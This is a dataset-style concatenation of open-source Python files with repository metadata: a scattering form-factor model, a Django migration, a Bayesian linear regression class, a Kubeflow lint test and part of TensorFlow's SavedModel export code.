self.rmin=rmin
self.rmax=rmax
self.Nr=Nr
self.Rc=Rc
self.strho=strho
self.tst=tst
self.lrho=lrho
self.lexp=lexp
self.rhosol=rhosol
self.norm=norm
self.bkg=bkg
self.__mpar__=mpar
self.choices={}
self.__xrdb__=XrayDB()
self.init_params()
def init_params(self):
self.params=Parameters()
self.params.add('Rc',value=self.Rc,vary=0,min=-np.inf,max=np.inf,expr=None,brute_step=0.1)
self.params.add('strho', value=self.strho, vary=0, min=-np.inf, max=np.inf, expr=None, brute_step=0.1)
self.params.add('tst', value=self.tst, vary=0, min=-np.inf, max=np.inf, expr=None, brute_step=0.1)
self.params.add('lrho', value=self.lrho, vary=0, min=-np.inf, max=np.inf, expr=None, brute_step=0.1)
self.params.add('lexp', value=self.lexp, vary=0, min=-np.inf, max=np.inf, expr=None, brute_step=0.1)
self.params.add('norm', value=self.norm, vary=0, min=-np.inf, max=np.inf, expr=None, brute_step=0.1)
self.params.add('bkg', value=self.bkg, vary=0, min=-np.inf, max=np.inf, expr=None, brute_step=0.1)
def solrho(self, r, Rp=100.0, Rc=12.5, strho=1.0, tst=2.0, lrho=0.5, lexp=10.0, rhosol=0.0):
R1=Rc
R2=Rc+tst
integral=lexp*(R2**2*np.exp(-R2/lexp)-Rp**2*np.exp(-Rp/lexp))+2*lexp**2*(R2*np.exp(-R2/lexp)-Rp*np.exp(-Rp/lexp))+2*lexp**3*(np.exp(-Rp/lexp)-np.exp(-R2/lexp))
rhos=(rhosol*(Rp**3-R1**3)-strho*(R2**3-R1**3)-3*lrho*integral*np.exp(R2/lexp))/(Rp**3-R2**3)
self.output_params['scaler_parameters']['rho_bulk']=rhos
stern = np.where(r > R1, strho, 0.0) * np.where(r > R2, 0.0, 1.0)
diffuse = np.where(r > R2, lrho * np.exp(-(r - R2) / lexp) + rhos, 0.0)
rho = (stern + diffuse)
return rho
def calc_form(self, q, r, rho):
dr = r[1] - r[0]
form = np.zeros_like(q)
rho = (rho - rho[-1])* self.No/1e27
for r1, rho1 in zip(r, rho):
form = form + 4 * np.pi * r1 * rho1 * np.sin(q * r1) / q
form = (np.absolute(form) * dr)**2
return self.re2 * form * 1e-16 * self.No / 1e3
def y(self):
self.output_params={}
self.output_params['scaler_parameters']={}
r=np.linspace(self.rmin, self.rmax, self.Nr)
strho=self.params['strho'].value
tst=self.params['tst'].value
lrho=self.params['lrho'].value
lexp=self.params['lexp'].value
norm=self.params['norm'].value
bkg=self.params['bkg'].value
Rc = self.params['Rc'].value
Rp=(3/(4*np.pi*norm*6.022e23))**(1.0/3.0)*1e9
rho=self.solrho(r, Rp=Rp, Rc=Rc, strho=strho, tst=tst, lrho=lrho, lexp=lexp, rhosol=self.rhosol)
self.output_params['Electron_Density']={'x':r,'y':rho}
self.output_params['scaler_parameters']['Rp']=Rp
form=norm*self.calc_form(self.x,r,rho)+bkg
return form
if __name__=='__main__':
x=np.arange(0.001,1.0,0.1)
fun=SphericalShell_expDecay(x=x)
print(fun.y())
| true | true |
f7327574c3e9432aac029aee865c8a55bab5ede4 | 282 | py | Python | hexa/core/migrations/0008_ci_text.py | qgerome/openhexa-app | 8c9377b2ad972121d8e9575f5d52420212b52ed4 | [
"MIT"
] | 4 | 2021-07-19T12:53:21.000Z | 2022-01-26T17:45:02.000Z | hexa/core/migrations/0008_ci_text.py | qgerome/openhexa-app | 8c9377b2ad972121d8e9575f5d52420212b52ed4 | [
"MIT"
] | 20 | 2021-05-17T12:27:06.000Z | 2022-03-30T11:35:26.000Z | hexa/core/migrations/0008_ci_text.py | qgerome/openhexa-app | 8c9377b2ad972121d8e9575f5d52420212b52ed4 | [
"MIT"
] | 2 | 2021-09-07T04:19:59.000Z | 2022-02-08T15:33:29.000Z | # Generated by Django 4.0 on 2022-01-10 15:42
from django.contrib.postgres.operations import CITextExtension
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("core", "0007_ltree"),
]
operations = [CITextExtension()]
| 20.142857 | 62 | 0.712766 |
from django.contrib.postgres.operations import CITextExtension
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("core", "0007_ltree"),
]
operations = [CITextExtension()]
| true | true |
f7327641ba028e0a7583ec0d94fadffc14edd2ba | 3,143 | py | Python | prml/linear/_bayesian_regression.py | alexandru-dinu/PRML | acd823e098df67abe0306a70225e7539f8edda40 | [
"MIT"
] | null | null | null | prml/linear/_bayesian_regression.py | alexandru-dinu/PRML | acd823e098df67abe0306a70225e7539f8edda40 | [
"MIT"
] | null | null | null | prml/linear/_bayesian_regression.py | alexandru-dinu/PRML | acd823e098df67abe0306a70225e7539f8edda40 | [
"MIT"
] | 1 | 2019-06-22T20:56:02.000Z | 2019-06-22T20:56:02.000Z | import numpy as np
from prml.linear._regression import Regression
class BayesianRegression(Regression):
"""Bayesian regression model.
w ~ N(w|0, alpha^(-1)I)
y = X @ w
t ~ N(t|X @ w, beta^(-1))
"""
def __init__(self, alpha: float = 1.0, beta: float = 1.0):
"""Initialize bayesian linear regression model.
Parameters
----------
alpha : float, optional
Precision parameter of the prior, by default 1.
beta : float, optional
Precision parameter of the likelihood, by default 1.
"""
self.alpha = alpha
self.beta = beta
self.w_mean = None
self.w_precision = None
def _is_prior_defined(self) -> bool:
return self.w_mean is not None and self.w_precision is not None
def _get_prior(self, ndim: int) -> tuple:
if self._is_prior_defined():
return self.w_mean, self.w_precision
else:
return np.zeros(ndim), self.alpha * np.eye(ndim)
def fit(self, x_train: np.ndarray, y_train: np.ndarray):
"""Bayesian update of parameters given training dataset.
Parameters
----------
x_train : np.ndarray
training data independent variable (N, n_features)
y_train : np.ndarray
training data dependent variable
"""
mean_prev, precision_prev = self._get_prior(np.size(x_train, 1))
w_precision = precision_prev + self.beta * x_train.T @ x_train
w_mean = np.linalg.solve(
w_precision,
precision_prev @ mean_prev + self.beta * x_train.T @ y_train,
)
self.w_mean = w_mean
self.w_precision = w_precision
self.w_cov = np.linalg.inv(self.w_precision)
def predict(
self,
x: np.ndarray,
return_std: bool = False,
sample_size: int = None,
):
"""Return mean (and standard deviation) of predictive distribution.
Parameters
----------
x : np.ndarray
independent variable (N, n_features)
return_std : bool, optional
flag to return standard deviation (the default is False)
sample_size : int, optional
number of samples to draw from the predictive distribution
(the default is None, no sampling from the distribution)
Returns
-------
y : np.ndarray
mean of the predictive distribution (N,)
y_std : np.ndarray
standard deviation of the predictive distribution (N,)
y_sample : np.ndarray
samples from the predictive distribution (N, sample_size)
"""
if sample_size is not None:
w_sample = np.random.multivariate_normal(
self.w_mean,
self.w_cov,
size=sample_size,
)
y_sample = x @ w_sample.T
return y_sample
y = x @ self.w_mean
if return_std:
y_var = 1 / self.beta + np.sum(x @ self.w_cov * x, axis=1)
y_std = np.sqrt(y_var)
return y, y_std
return y
| 31.43 | 75 | 0.570474 | import numpy as np
from prml.linear._regression import Regression
class BayesianRegression(Regression):
def __init__(self, alpha: float = 1.0, beta: float = 1.0):
self.alpha = alpha
self.beta = beta
self.w_mean = None
self.w_precision = None
def _is_prior_defined(self) -> bool:
return self.w_mean is not None and self.w_precision is not None
def _get_prior(self, ndim: int) -> tuple:
if self._is_prior_defined():
return self.w_mean, self.w_precision
else:
return np.zeros(ndim), self.alpha * np.eye(ndim)
def fit(self, x_train: np.ndarray, y_train: np.ndarray):
mean_prev, precision_prev = self._get_prior(np.size(x_train, 1))
w_precision = precision_prev + self.beta * x_train.T @ x_train
w_mean = np.linalg.solve(
w_precision,
precision_prev @ mean_prev + self.beta * x_train.T @ y_train,
)
self.w_mean = w_mean
self.w_precision = w_precision
self.w_cov = np.linalg.inv(self.w_precision)
def predict(
self,
x: np.ndarray,
return_std: bool = False,
sample_size: int = None,
):
if sample_size is not None:
w_sample = np.random.multivariate_normal(
self.w_mean,
self.w_cov,
size=sample_size,
)
y_sample = x @ w_sample.T
return y_sample
y = x @ self.w_mean
if return_std:
y_var = 1 / self.beta + np.sum(x @ self.w_cov * x, axis=1)
y_std = np.sqrt(y_var)
return y, y_std
return y
| true | true |
f73276b8fb36b5de1ebbd4da742bc1622708cb89 | 3,072 | py | Python | py/kubeflow/testing/py_lint_test.py | ChanYiLin/testing | fab6c2782d18c3439b2699df7d1d7da154393e06 | [
"Apache-2.0"
] | null | null | null | py/kubeflow/testing/py_lint_test.py | ChanYiLin/testing | fab6c2782d18c3439b2699df7d1d7da154393e06 | [
"Apache-2.0"
] | 451 | 2021-01-22T12:27:17.000Z | 2022-03-30T02:08:22.000Z | py/kubeflow/testing/py_lint_test.py | ChanYiLin/testing | fab6c2782d18c3439b2699df7d1d7da154393e06 | [
"Apache-2.0"
] | null | null | null | import fnmatch
import logging
import os
import subprocess
from kubeflow.testing import util
import pytest
logging.basicConfig(
level=logging.INFO,
format=('%(levelname)s|%(asctime)s'
'|%(pathname)s|%(lineno)d| %(message)s'),
datefmt='%Y-%m-%dT%H:%M:%S',
)
logging.getLogger().setLevel(logging.INFO)
def should_exclude(root, full_dir_excludes):
for e in full_dir_excludes:
if root.startswith(e):
return True
return False
def test_lint(record_xml_attribute, src_dir, rcfile): # pylint: disable=redefined-outer-name
# Override the classname attribute in the junit file.
# This makes it easy to group related tests in test grid.
# http://doc.pytest.org/en/latest/usage.html#record-xml-attribute
util.set_pytest_junit(record_xml_attribute, "test_py_lint")
logging.info('Running test_lint')
pylint_bin = "pylint"
# Print out the pylint version because different versions can produce
# different results.
util.run([pylint_bin, "--version"])
# kubeflow_testing is imported as a submodule so we should exclude it
# TODO(jlewi): We should make this an argument.
dir_excludes = [
"dashboard/frontend/node_modules",
"kubeflow_testing",
"dev-kubeflow-org/ks-app/vendor",
# TODO(https://github.com/kubeflow/testing/issues/560) stop skipping
# py/kubeflow/testing/cd once we update python & pylint so f style
# strings don't generate lint errors.
"kubeflow/testing",
"release-infra",
]
full_dir_excludes = [
os.path.join(os.path.abspath(src_dir), f) for f in dir_excludes
]
logging.info("Directories to be excluded: %s", ",".join(full_dir_excludes))
# TODO(jlewi): Use pathlib once we switch to python3.
includes = ["*.py"]
failed_files = []
if not rcfile:
rcfile = os.path.join(src_dir, ".pylintrc")
for root, dirs, files in os.walk(os.path.abspath(src_dir), topdown=True):
# Exclude vendor directories and all sub files.
if "vendor" in root.split(os.sep):
continue
# excludes can be done with fnmatch.filter and complementary set,
# but it's more annoying to read.
if should_exclude(root, full_dir_excludes):
logging.info("Skipping directory %s", root)
continue
dirs[:] = [d for d in dirs]
for pat in includes:
for f in fnmatch.filter(files, pat):
full_path = os.path.join(root, f)
try:
util.run(
[pylint_bin, "--rcfile=" + rcfile, full_path], cwd=src_dir)
except subprocess.CalledProcessError:
failed_files.append(full_path[len(src_dir):])
if failed_files:
failed_files.sort()
logging.error("%s files had lint errors:\n%s", len(failed_files),
"\n".join(failed_files))
else:
logging.info("No lint issues.")
assert not failed_files
if __name__ == "__main__":
logging.basicConfig(
level=logging.INFO,
format=('%(levelname)s|%(asctime)s'
'|%(pathname)s|%(lineno)d| %(message)s'),
datefmt='%Y-%m-%dT%H:%M:%S',
)
logging.getLogger().setLevel(logging.INFO)
pytest.main()
| 30.72 | 92 | 0.675456 | import fnmatch
import logging
import os
import subprocess
from kubeflow.testing import util
import pytest
logging.basicConfig(
level=logging.INFO,
format=('%(levelname)s|%(asctime)s'
'|%(pathname)s|%(lineno)d| %(message)s'),
datefmt='%Y-%m-%dT%H:%M:%S',
)
logging.getLogger().setLevel(logging.INFO)
def should_exclude(root, full_dir_excludes):
for e in full_dir_excludes:
if root.startswith(e):
return True
return False
def test_lint(record_xml_attribute, src_dir, rcfile):
nit(record_xml_attribute, "test_py_lint")
logging.info('Running test_lint')
pylint_bin = "pylint"
util.run([pylint_bin, "--version"])
dir_excludes = [
"dashboard/frontend/node_modules",
"kubeflow_testing",
"dev-kubeflow-org/ks-app/vendor",
"kubeflow/testing",
"release-infra",
]
full_dir_excludes = [
os.path.join(os.path.abspath(src_dir), f) for f in dir_excludes
]
logging.info("Directories to be excluded: %s", ",".join(full_dir_excludes))
# TODO(jlewi): Use pathlib once we switch to python3.
includes = ["*.py"]
failed_files = []
if not rcfile:
rcfile = os.path.join(src_dir, ".pylintrc")
for root, dirs, files in os.walk(os.path.abspath(src_dir), topdown=True):
# Exclude vendor directories and all sub files.
if "vendor" in root.split(os.sep):
continue
# excludes can be done with fnmatch.filter and complementary set,
# but it's more annoying to read.
if should_exclude(root, full_dir_excludes):
logging.info("Skipping directory %s", root)
continue
dirs[:] = [d for d in dirs]
for pat in includes:
for f in fnmatch.filter(files, pat):
full_path = os.path.join(root, f)
try:
util.run(
[pylint_bin, "--rcfile=" + rcfile, full_path], cwd=src_dir)
except subprocess.CalledProcessError:
failed_files.append(full_path[len(src_dir):])
if failed_files:
failed_files.sort()
logging.error("%s files had lint errors:\n%s", len(failed_files),
"\n".join(failed_files))
else:
logging.info("No lint issues.")
assert not failed_files
if __name__ == "__main__":
logging.basicConfig(
level=logging.INFO,
format=('%(levelname)s|%(asctime)s'
'|%(pathname)s|%(lineno)d| %(message)s'),
datefmt='%Y-%m-%dT%H:%M:%S',
)
logging.getLogger().setLevel(logging.INFO)
pytest.main()
| true | true |
f73276ff40784e608204573966e21fed99f4909c | 38,349 | py | Python | tensorflow/python/saved_model/save.py | jnorwood/tensorflow | 67ab6c9cebc4cbb2103246a1523d04261bef22d2 | [
"Apache-2.0"
] | 2 | 2019-06-01T08:12:42.000Z | 2019-06-01T08:13:22.000Z | tensorflow/python/saved_model/save.py | jnorwood/tensorflow | 67ab6c9cebc4cbb2103246a1523d04261bef22d2 | [
"Apache-2.0"
] | null | null | null | tensorflow/python/saved_model/save.py | jnorwood/tensorflow | 67ab6c9cebc4cbb2103246a1523d04261bef22d2 | [
"Apache-2.0"
] | 1 | 2019-05-25T17:45:38.000Z | 2019-05-25T17:45:38.000Z | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Exports a SavedModel from a Trackable Python object."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
from tensorflow.core.framework import versions_pb2
from tensorflow.core.protobuf import meta_graph_pb2
from tensorflow.core.protobuf import saved_model_pb2
from tensorflow.core.protobuf import saved_object_graph_pb2
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import function as defun
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import meta_graph
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import versions
from tensorflow.python.lib.io import file_io
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.saved_model import builder_impl
from tensorflow.python.saved_model import constants
from tensorflow.python.saved_model import function_serialization
from tensorflow.python.saved_model import nested_structure_coder
from tensorflow.python.saved_model import revived_types
from tensorflow.python.saved_model import signature_constants
from tensorflow.python.saved_model import signature_def_utils
from tensorflow.python.saved_model import signature_serialization
from tensorflow.python.saved_model import tag_constants
from tensorflow.python.saved_model import utils_impl
from tensorflow.python.training.saving import functional_saver
from tensorflow.python.training.tracking import base
from tensorflow.python.training.tracking import graph_view
from tensorflow.python.training.tracking import object_identity
from tensorflow.python.training.tracking import tracking
from tensorflow.python.training.tracking import util
from tensorflow.python.util import compat
from tensorflow.python.util.tf_export import tf_export
_UNCOPIABLE_DTYPES = frozenset((dtypes.resource, dtypes.variant))
# A container for an EagerTensor constant which has been copied to the exported
# Graph.
_CapturedConstant = collections.namedtuple(
"_CapturedConstant", ["eager_tensor", "graph_tensor"])
class _AugmentedGraphView(graph_view.ObjectGraphView):
"""An extendable graph which also tracks functions attached to objects.
Extensions through `add_object` appear in the object graph and any checkpoints
generated from it, even if they are not dependencies of the node they were
attached to in the saving program. For example a `.signatures` attribute is
added to exported SavedModel root objects without modifying the root object
itself.
Also tracks functions attached to objects in the graph, through the caching
`list_functions` method. Enumerating functions only through this method
ensures that we get a consistent view of functions, even if object attributes
create new functions every time they are accessed.
"""
def __init__(self, root):
if (not context.executing_eagerly()
and not ops.inside_function()):
saveables_cache = object_identity.ObjectIdentityWeakKeyDictionary()
else:
saveables_cache = None
super(_AugmentedGraphView, self).__init__(root, saveables_cache)
# Object -> (name -> dep)
self._extra_dependencies = object_identity.ObjectIdentityDictionary()
self._functions = object_identity.ObjectIdentityDictionary()
def add_object(self, parent_node, name_in_parent, subgraph_root):
"""Attach an object to `parent_node`, overriding any existing dependency."""
self._extra_dependencies.setdefault(
parent_node, {})[name_in_parent] = subgraph_root
def list_dependencies(self, obj):
"""Overrides a parent method to include `add_object` objects."""
extra_dependencies = self._extra_dependencies.get(obj, {})
used_names = set()
for name, dep in super(_AugmentedGraphView, self).list_dependencies(obj):
used_names.add(name)
if name in extra_dependencies:
yield base.TrackableReference(name, extra_dependencies[name])
else:
yield base.TrackableReference(name, dep)
for name, dep in extra_dependencies.items():
if name in used_names:
continue
yield base.TrackableReference(name, dep)
def list_functions(self, obj):
obj_functions = self._functions.get(obj, None)
if obj_functions is None:
obj_functions = obj._list_functions_for_serialization() # pylint: disable=protected-access
self._functions[obj] = obj_functions
return obj_functions
class _SaveableView(object):
"""Provides a frozen view over a trackable root.
This class helps creating a single stable view over an object to save. The
saving code should access properties and functions via this class and not via
the original object as there are cases where an object construct their
trackable attributes and functions dynamically per call and will yield
different objects if invoked more than once.
Changes to the graph, for example adding objects, must happen in
`checkpoint_view` (an `_AugmentedGraphView`) before the `_SaveableView` is
constructed. Changes after the `_SaveableView` has been constructed will be
ignored.
"""
def __init__(self, checkpoint_view):
self.checkpoint_view = checkpoint_view
trackable_objects, node_ids, slot_variables = (
self.checkpoint_view.objects_ids_and_slot_variables())
self.nodes = trackable_objects
self.node_ids = node_ids
self.captured_tensor_node_ids = object_identity.ObjectIdentityDictionary()
self.slot_variables = slot_variables
self.concrete_functions = []
# Also add `Function`s as nodes.
nodes_without_functions = list(self.nodes)
seen_function_names = set()
for node in nodes_without_functions:
for function in checkpoint_view.list_functions(node).values():
if function not in self.node_ids:
self.node_ids[function] = len(self.nodes)
self.nodes.append(function)
if isinstance(function, def_function.Function):
# Force listing the concrete functions for the side effects:
# - populate the cache for functions that have an input_signature
# and have not been called.
# - force side effects of creation of concrete functions, e.g. create
# variables on first run.
concrete_functions = (
function._list_all_concrete_functions_for_serialization()) # pylint: disable=protected-access
else:
concrete_functions = [function]
for concrete_function in concrete_functions:
if concrete_function.name not in seen_function_names:
seen_function_names.add(concrete_function.name)
self.concrete_functions.append(concrete_function)
@property
def root(self):
return self.nodes[0]
def fill_object_graph_proto(self, proto):
"""Populate the nodes, children and slot_variables of a SavedObjectGraph."""
for node_id, node in enumerate(self.nodes):
assert self.node_ids[node] == node_id
object_proto = proto.nodes.add()
object_proto.slot_variables.extend(self.slot_variables.get(node, ()))
if isinstance(node, (def_function.Function, defun.ConcreteFunction,
_CapturedConstant)):
continue
for child in self.checkpoint_view.list_dependencies(node):
child_proto = object_proto.children.add()
child_proto.node_id = self.node_ids[child.ref]
child_proto.local_name = child.name
for local_name, ref_function in (
self.checkpoint_view.list_functions(node).items()):
child_proto = object_proto.children.add()
child_proto.node_id = self.node_ids[ref_function]
child_proto.local_name = local_name
def map_resources(self):
"""Makes new resource handle ops corresponding to existing resource tensors.
Creates resource handle ops in the current default graph, whereas
`accessible_objects` will be from an eager context. Resource mapping adds
resource handle ops to the main GraphDef of a SavedModel, which allows the
C++ loader API to interact with variables.
Returns:
A tuple of (object_map, resource_map, asset_info):
object_map: A dictionary mapping from object in `accessible_objects` to
replacement objects created to hold the new resource tensors.
resource_map: A dictionary mapping from resource tensors extracted from
`accessible_objects` to newly created resource tensors.
asset_info: An _AssetInfo tuple describing external assets referenced
from accessible_objects.
"""
# Only makes sense when adding to the export Graph
assert not context.executing_eagerly()
# TODO(allenl): Handle MirroredVariables and other types of variables which
# may need special casing.
object_map = object_identity.ObjectIdentityDictionary()
resource_map = {}
asset_info = _AssetInfo(
asset_defs=[],
asset_initializers_by_resource={},
asset_filename_map={},
asset_index={})
for node_id, obj in enumerate(self.nodes):
if isinstance(obj, tracking.CapturableResource):
# pylint: disable=protected-access
with ops.device(obj._resource_device):
new_resource = obj._create_resource()
# pylint: enable=protected-access
resource_map[obj.resource_handle] = new_resource
self.captured_tensor_node_ids[obj.resource_handle] = node_id
elif resource_variable_ops.is_resource_variable(obj):
new_variable = resource_variable_ops.copy_to_graph_uninitialized(obj)
object_map[obj] = new_variable
resource_map[obj.handle] = new_variable.handle
self.captured_tensor_node_ids[obj.handle] = node_id
elif isinstance(obj, tracking.TrackableAsset):
_process_asset(obj, asset_info, resource_map)
self.captured_tensor_node_ids[obj.asset_path] = node_id
for concrete_function in self.concrete_functions:
for capture in concrete_function.captured_inputs:
if (tensor_util.is_tensor(capture)
and capture.dtype not in _UNCOPIABLE_DTYPES
and capture not in self.captured_tensor_node_ids):
copied_tensor = constant_op.constant(
tensor_util.constant_value(capture))
node_id = len(self.nodes)
node = _CapturedConstant(
eager_tensor=capture, graph_tensor=copied_tensor)
self.nodes.append(node)
self.node_ids[capture] = node_id
self.node_ids[node] = node_id
self.captured_tensor_node_ids[capture] = node_id
resource_map[capture] = copied_tensor
return object_map, resource_map, asset_info
def _tensor_dict_to_tensorinfo(tensor_dict):
return {key: utils_impl.build_tensor_info_internal(value)
for key, value in tensor_dict.items()}
def _map_captures_to_created_tensors(
original_captures, resource_map):
"""Maps eager tensors captured by a function to Graph resources for export.
Args:
original_captures: A dictionary mapping from tensors captured by the
function to interior placeholders for those tensors (inside the function
body).
resource_map: A dictionary mapping from resource tensors owned by the eager
context to resource tensors in the exported graph.
Returns:
A list of stand-in tensors which belong to the exported graph, corresponding
to the function's captures.
Raises:
AssertionError: If the function references a resource which is not part of
`resource_map`.
"""
export_captures = []
for exterior, interior in original_captures.items():
mapped_resource = resource_map.get(exterior, None)
if mapped_resource is None:
raise AssertionError(
("Tried to export a function which references untracked object {}."
"TensorFlow objects (e.g. tf.Variable) captured by functions must "
"be tracked by assigning them to an attribute of a tracked object "
"or assigned to an attribute of the main object directly.")
.format(interior))
export_captures.append(mapped_resource)
return export_captures
def _map_function_arguments_to_created_inputs(
function_arguments, signature_key, function_name):
"""Creates exterior placeholders in the exported graph for function arguments.
Functions have two types of inputs: tensors captured from the outside (eager)
context, and arguments to the function which we expect to receive from the
user at each call. `_map_captures_to_created_tensors` replaces
captured tensors with stand-ins (typically these are resource dtype tensors
associated with variables). `_map_function_inputs_to_created_inputs` runs over
every argument, creating a new placeholder for each which will belong to the
exported graph rather than the function body.
Args:
function_arguments: A list of argument placeholders in the function body.
signature_key: The name of the signature being exported, for error messages.
function_name: The name of the function, for error messages.
Returns:
A tuple of (mapped_inputs, exterior_placeholders)
mapped_inputs: A list with entries corresponding to `function_arguments`
containing all of the inputs of the function gathered from the exported
graph (both captured resources and arguments).
exterior_argument_placeholders: A dictionary mapping from argument names
to placeholders in the exported graph, containing the explicit arguments
to the function which a user is expected to provide.
Raises:
ValueError: If argument names are not unique.
"""
# `exterior_argument_placeholders` holds placeholders which are outside the
# function body, directly contained in a MetaGraph of the SavedModel. The
# function body itself contains nearly identical placeholders used when
# running the function, but these exterior placeholders allow Session-based
# APIs to call the function using feeds and fetches which name Tensors in the
# MetaGraph.
exterior_argument_placeholders = {}
mapped_inputs = []
for placeholder in function_arguments:
# `export_captures` contains an exhaustive set of captures, so if we don't
# find the input there then we now know we have an argument.
user_input_name = compat.as_str_any(
placeholder.op.get_attr("_user_specified_name"))
# If the internal placeholders for a function have names which were
# uniquified by TensorFlow, then a single user-specified argument name
# must refer to multiple Tensors. The resulting signatures would be
# confusing to call. Instead, we throw an exception telling the user to
# specify explicit names.
if user_input_name != placeholder.op.name:
# This should be unreachable, since concrete functions may not be
# generated with non-unique argument names.
raise ValueError(
("Got non-flat/non-unique argument names for SavedModel "
"signature '{}': more than one argument to '{}' was named '{}'. "
"Signatures have one Tensor per named input, so to have "
"predictable names Python functions used to generate these "
"signatures should avoid *args and Tensors in nested "
"structures unless unique names are specified for each. Use "
"tf.TensorSpec(..., name=...) to provide a name for a Tensor "
"input.")
.format(signature_key, compat.as_str_any(function_name),
user_input_name))
arg_placeholder = array_ops.placeholder(
shape=placeholder.shape,
dtype=placeholder.dtype,
name="{}_{}".format(signature_key, user_input_name))
exterior_argument_placeholders[user_input_name] = arg_placeholder
mapped_inputs.append(arg_placeholder)
return mapped_inputs, exterior_argument_placeholders
def _call_function_with_mapped_captures(function, args, resource_map):
"""Calls `function` in the exported graph, using mapped resource captures."""
export_captures = _map_captures_to_created_tensors(
function.graph.captures, resource_map)
mapped_inputs = args + export_captures
# Calls the function quite directly, since we have new captured resource
# tensors we need to feed in which weren't part of the original function
# definition.
# pylint: disable=protected-access
outputs = function._build_call_outputs(
function._inference_function.call(context.context(), mapped_inputs))
return outputs
def _generate_signatures(signature_functions, resource_map):
"""Validates and calls `signature_functions` in the default graph.
Args:
signature_functions: A dictionary mapping string keys to concrete TensorFlow
functions (e.g. from `signature_serialization.canonicalize_signatures`)
which will be used to generate SignatureDefs.
resource_map: A dictionary mapping from resource tensors in the eager
context to resource tensors in the Graph being exported. This dictionary
is used to re-bind resources captured by functions to tensors which will
exist in the SavedModel.
Returns:
Each function in the `signature_functions` dictionary is called with
placeholder Tensors, generating a function call operation and output
Tensors. The placeholder Tensors, the function call operation, and the
output Tensors from the function call are part of the default Graph.
This function then returns a dictionary with the same structure as
`signature_functions`, with the concrete functions replaced by SignatureDefs
implicitly containing information about how to call each function from a
TensorFlow 1.x Session / the C++ Loader API. These SignatureDefs reference
the generated placeholders and Tensor outputs by name.
The caller is expected to include the default Graph set while calling this
function as a MetaGraph in a SavedModel, including the returned
SignatureDefs as part of that MetaGraph.
"""
signatures = {}
for signature_key, function in sorted(signature_functions.items()):
if function.graph.captures:
argument_inputs = function.graph.inputs[:-len(function.graph.captures)]
else:
argument_inputs = function.graph.inputs
mapped_inputs, exterior_argument_placeholders = (
_map_function_arguments_to_created_inputs(
argument_inputs, signature_key, function.name))
outputs = _call_function_with_mapped_captures(
function, mapped_inputs, resource_map)
signatures[signature_key] = signature_def_utils.build_signature_def(
_tensor_dict_to_tensorinfo(exterior_argument_placeholders),
_tensor_dict_to_tensorinfo(outputs),
method_name=signature_constants.PREDICT_METHOD_NAME)
return signatures
def _trace_resource_initializers(accessible_objects):
"""Create concrete functions from `CapturableResource` objects."""
resource_initializers = []
def _wrap_initializer(obj):
obj._initialize() # pylint: disable=protected-access
return constant_op.constant(1.) # Dummy control output
def _wrap_obj_initializer(obj):
return lambda: _wrap_initializer(obj)
for obj in accessible_objects:
if isinstance(obj, tracking.CapturableResource):
resource_initializers.append(def_function.function(
_wrap_obj_initializer(obj),
# All inputs are captures.
input_signature=[]).get_concrete_function())
return resource_initializers
_AssetInfo = collections.namedtuple(
"_AssetInfo", [
# List of AssetFileDef protocol buffers
"asset_defs",
# Map from asset variable resource Tensors to their init ops
"asset_initializers_by_resource",
# Map from base asset filenames to full paths
"asset_filename_map",
# Map from TrackableAsset to index of corresponding AssetFileDef
"asset_index"])
def _process_asset(trackable_asset, asset_info, resource_map):
"""Add `trackable_asset` to `asset_info` and `resource_map`."""
original_path_tensor = trackable_asset.asset_path
original_path = tensor_util.constant_value(original_path_tensor)
try:
original_path = str(original_path.astype(str))
except AttributeError:
# Already a string rather than a numpy array
pass
path = builder_impl.get_asset_filename_to_add(
asset_filepath=original_path,
asset_filename_map=asset_info.asset_filename_map)
# TODO(andresp): Instead of mapping 1-1 between trackable asset
# and asset in the graph def consider deduping the assets that
# point to the same file.
asset_path_initializer = array_ops.placeholder(
shape=original_path_tensor.shape,
dtype=dtypes.string,
name="asset_path_initializer")
asset_variable = resource_variable_ops.ResourceVariable(
asset_path_initializer)
asset_info.asset_filename_map[path] = original_path
asset_def = meta_graph_pb2.AssetFileDef()
asset_def.filename = path
asset_def.tensor_info.name = asset_path_initializer.name
asset_info.asset_defs.append(asset_def)
asset_info.asset_initializers_by_resource[original_path_tensor] = (
asset_variable.initializer)
asset_info.asset_index[trackable_asset] = len(asset_info.asset_defs) - 1
resource_map[original_path_tensor] = asset_variable
def _fill_meta_graph_def(meta_graph_def, saveable_view, signature_functions):
"""Generates a MetaGraph which calls `signature_functions`.
Args:
meta_graph_def: The MetaGraphDef proto to fill.
saveable_view: The _SaveableView being exported.
signature_functions: A dictionary mapping signature keys to concrete
functions containing signatures to add to the MetaGraph.
Returns:
An _AssetInfo, which contains information to help creating the SavedModel.
"""
# List objects from the eager context to make sure Optimizers give us the
# right Graph-dependent variables.
accessible_objects = saveable_view.nodes
resource_initializer_functions = _trace_resource_initializers(
accessible_objects)
exported_graph = ops.Graph()
resource_initializer_ops = []
with exported_graph.as_default():
object_map, resource_map, asset_info = saveable_view.map_resources()
for resource_initializer_function in resource_initializer_functions:
asset_dependencies = []
for capture in resource_initializer_function.graph.external_captures:
asset_initializer = asset_info.asset_initializers_by_resource.get(
capture, None)
if asset_initializer is not None:
asset_dependencies.append(asset_initializer)
with ops.control_dependencies(asset_dependencies):
resource_initializer_ops.append(
_call_function_with_mapped_captures(
resource_initializer_function, [], resource_map))
resource_initializer_ops.extend(
asset_info.asset_initializers_by_resource.values())
with ops.control_dependencies(resource_initializer_ops):
init_op = control_flow_ops.no_op()
# Add the same op to the main_op collection and to the init_op
